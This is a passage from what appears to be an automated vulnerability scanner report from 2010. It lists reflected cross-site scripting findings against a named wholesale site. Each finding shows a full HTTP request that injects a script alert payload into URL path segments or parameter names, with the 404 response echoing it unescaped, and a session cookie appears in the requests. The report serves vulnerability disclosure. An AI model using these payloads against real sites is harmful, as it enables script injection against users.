This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=260a84<a>1855c2ad138 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=260a84<a>1855c2ad138 was not found on this server.</p>
...[SNIP]...

2.3881. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32bfa<script>alert(1)</script>734f6067136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale32bfa<script>alert(1)</script>734f6067136/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale32bfa<script>alert(1)</script>734f6067136/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3882. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a4f0<script>alert(1)</script>c6b1398899d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes1a4f0<script>alert(1)</script>c6b1398899d/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes1a4f0<script>alert(1)</script>c6b1398899d/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3883. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad581<script>alert(1)</script>4d96bdea618 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmosad581<script>alert(1)</script>4d96bdea618/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmosad581<script>alert(1)</script>4d96bdea618/images/review/ was not found on this server.</p>
...[SNIP]...

2.3884. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 904ac<script>alert(1)</script>4dc7f25a999 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images904ac<script>alert(1)</script>4dc7f25a999/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images904ac<script>alert(1)</script>4dc7f25a999/review/ was not found on this server.</p>
...[SNIP]...

2.3885. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1ce06<script>alert(1)</script>a5b3f105f1e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review1ce06<script>alert(1)</script>a5b3f105f1e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review1ce06<script>alert(1)</script>a5b3f105f1e/ was not found on this server.</p>
...[SNIP]...

2.3886. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0919<script>alert(1)</script>8f1ad67317e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/?c0919<script>alert(1)</script>8f1ad67317e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/?c0919<script>alert(1)</script>8f1ad67317e=1 was not found on this server.</p>
...[SNIP]...

2.3887. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ee4b<script>alert(1)</script>46a0b06ea22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale5ee4b<script>alert(1)</script>46a0b06ea22/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale5ee4b<script>alert(1)</script>46a0b06ea22/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.3888. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d3c4b<script>alert(1)</script>533a1a5b5ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themesd3c4b<script>alert(1)</script>533a1a5b5ab/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themesd3c4b<script>alert(1)</script>533a1a5b5ab/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.3889. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ae9ad<script>alert(1)</script>67fa02479cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmosae9ad<script>alert(1)</script>67fa02479cd/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmosae9ad<script>alert(1)</script>67fa02479cd/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.3890. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0b63<script>alert(1)</script>b7251b20e8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/imagesb0b63<script>alert(1)</script>b7251b20e8/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/imagesb0b63<script>alert(1)</script>b7251b20e8/review/0.gif was not found on this server.</p>
...[SNIP]...

2.3891. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e2009<script>alert(1)</script>befc4aa17cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/reviewe2009<script>alert(1)</script>befc4aa17cc/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/reviewe2009<script>alert(1)</script>befc4aa17cc/0.gif was not found on this server.</p>
...[SNIP]...

2.3892. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1dca5<script>alert(1)</script>defbb570f36 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/0.gif1dca5<script>alert(1)</script>defbb570f36 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/0.gif1dca5<script>alert(1)</script>defbb570f36 was not found on this server.</p>
...[SNIP]...

2.3893. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d84e7<script>alert(1)</script>731f3a01bd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/0.gif?d84e7<script>alert(1)</script>731f3a01bd5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/0.gif?d84e7<script>alert(1)</script>731f3a01bd5=1 was not found on this server.</p>
...[SNIP]...

2.3894. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9730d<script>alert(1)</script>11b45b65099 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale9730d<script>alert(1)</script>11b45b65099/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale9730d<script>alert(1)</script>11b45b65099/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3895. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9738a<script>alert(1)</script>c1939642063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes9738a<script>alert(1)</script>c1939642063/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes9738a<script>alert(1)</script>c1939642063/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3896. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2547e<script>alert(1)</script>8f5f09e3913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos2547e<script>alert(1)</script>8f5f09e3913/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos2547e<script>alert(1)</script>8f5f09e3913/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3897. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83cb9<script>alert(1)</script>9198d20764e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images83cb9<script>alert(1)</script>9198d20764e/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images83cb9<script>alert(1)</script>9198d20764e/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3898. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2b8ed<script>alert(1)</script>09bc5b8e85 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review2b8ed<script>alert(1)</script>09bc5b8e85/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

